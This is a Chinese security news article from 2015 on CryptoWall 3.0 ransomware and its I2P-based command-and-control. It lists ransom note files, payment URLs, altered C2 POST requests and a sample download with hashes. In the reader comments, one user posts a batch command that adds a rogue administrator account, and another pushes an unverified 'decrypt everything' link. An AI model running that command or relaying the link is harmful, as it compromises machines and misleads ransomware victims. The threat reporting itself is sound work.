i2p

使用I2P匿名网络通信，又一款勒索软件CryptoWall 3.0来了

Sphinx2015-01-17共412541人围观，发现 18 个不明物体工具资讯

FreeBuf已经报道过不计其数的勒索软件，而最近研究人员又发现了一款特别的——它使用I2P匿名网络进行通信，名为Cryptowall 3.0。

一天感染288个用户

来自法国的安全研究员Kafeine在其博客中确认了这款软件使用I2P匿名网络进行C&C通讯，在@Horgh_RCE的反编译下为我们揭开了Cryptowall 3.0的面纱。
微软提供的数据显示从1月11日至1月12日一天时间里，Cryptowall感染了288个用户。

相较之前的变种，软件在用于勒索的提示文件的文件名上有少许变化：

    HELP_DECRYPT.HTML
    HELP_DECRYPT.PNG
    HELP_DECRYPT.TXT
    HELP_DECRYPT.URL

贴心的用户体验

以下则是HELP_DECRYPT.PNG的内容：

该款勒索软件十分贴心，HELP_DECRYPT.PNG语言版本是根据用户的IP决定的，如法国安全研究员Kafeine的HELP_DECRYPT.PNG：

针对不同的用户，文中的链接也各不相同。以下是Kafeine提供的一组链接：

http://paytoc4gtpn5czl2.torforall.com/1c3L59z
http://paytoc4gtpn5czl2.torman2.com/1c3L59z
http://paytoc4gtpn5czl2.torwoman.com/1c3L59z
http://paytoc4gtpn5czl2.torroadsters.com/1c3L59z

软件完成对用户文件的加密后会提示用户使用比特币支付赎金。自CoinVault之后，免费解密一个文件似乎要变成行业标准了，CryptoWall 3.0也附带了这一功能：

软件使用以下服务获取IP：
"http://ip-addr.es"
"http://myexternalip.com/raw"
"http://curlmyip.com"

I2P协议传输
与C&C服务器的通讯似乎是通过Rc4加密了，并且数据通过i2p协议传输：

--------------数据稍经修改-------
POST http://proxy2-2-2.i2p/p1256nl9su84v HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy2-2-2.i2p
v=ec3eafb5dc5dc44d97d2431fe0a6503683360c2c4e5b508a1c45e51b64de6d13d031063ed7ce7e6f9740e95e614e63541eec23ac50312847479a8eba8dd46295a27c

---------------数据稍经修改-------
POST http://proxy1-1-1.i2p/hz13ackt0y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Content-Length: 134
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
Host: proxy1-1-1.i2p
z=1eeac100e243ed18d3feef446e7800f38c49dc63d7142ce2c024d6a6502e109fcdcee52fa6e59d45648f195d8579265652c334af833ebc7f8e40edcc55ac1c6db626
--------------------------------------------------

经过解密后的数据：(不要尝试解密前面的数据，我们故意修改了有些十六进制数)
z={1|crypt1|27CE3C5E636291E531C77FA566559DDF|2|1|2||xxx.xxx.xxx.xxx}

样本下载

Cryptowall_3.0.zip,密码:infected
文件应包含6c3e6143ab699d6b78551d417c0a1a45和47363b94cee907e2b8926c1be61150c7

[参考来源Malware don't need Coffee & TechNet，译/Sphinx，转载请注明来自Freebuf黑客与极客（FreeBuf.COM）]

这些评论亮了

play(1级)回复

国内的傻逼设个开机密码留个QQ也是笑了

)20(亮了
王帅(1级)回复

不好意思，我正好中招了，有解决的办法吗？

)6(亮了

发表评论

已有 18 条评论

kelenight (1级) 2015-01-17回复1楼

勒索软件成趋势了？

亮了(4)
鹫尾1 2015-01-17回复2楼

应该翻译一下那个可以教任何人写勒索软件的文章，

亮了(5)
不愿透露性别的王先生 2015-01-17回复3楼

样本运行会有什么效果?

亮了(3)
- Hilun 2015-01-17回复
  
  @ 不愿透露性别的王先生文件被加密，你六神无主。产生悲剧…..
  
  亮了(5)
BlackhorseXIII (2级) 2015-01-17回复4楼

money 人人爱啊

亮了(0)
play (1级) 2015-01-17回复5楼

国内的亲爱的设个开机密码留个QQ也是笑了

亮了(20)
cnseay (1级) 2015-01-17回复6楼

echo "net user administrator /active:no & net user Cnseay 123qwe!@# /add & net localgroup administrators Cnseay! /add " > i-am-p7.bat & start i-am-p7.bat

亮了(5)
LIwianwpIO (2级) 2015-01-17回复7楼

又是I2P，难道这是趋势？

亮了(1)
echotxl (3级)我的密码泄露了，我在考虑要不要改密码。。。 2015-01-18回复8楼

在中国能连上i2p网络吗？

亮了(4)
TOMMYTP 2015-07-25回复9楼

http://tieba.baidu.com/p/3920361936 破解全过程

亮了(2)
- wtf 2015-08-26回复
  
  @ TOMMYTP 这tmd叫破解，这叫给绑匪赎金
  
  亮了(4)
achusa (1级) 2015-08-13回复10楼

I2P协议怎么防？

亮了(0)
Esion臣 2015-08-27回复11楼

那这个病有没有办法清除，之前失损的文件还能恢复吗？

亮了(1)
王帅 (1级) 2015-11-15回复12楼

不好意思，我正好中招了，有解决的办法吗？

亮了(6)
sscryptowall (1级) 2016-01-03回复13楼

http://dwz.cn/cryptowall 这里可以解密全部东西

亮了(0)
sscryptowall (1级) 2016-01-09回复14楼

http://dwz.cn/cryptowall

亮了(1)
狗华 2016-10-07回复15楼

@ play 那种亲爱的也只能欺负一些电脑小白

亮了(0)
世态炎凉 2016-10-09回复16楼

哭，文件被病毒加密了，有没有办法解

亮了(0)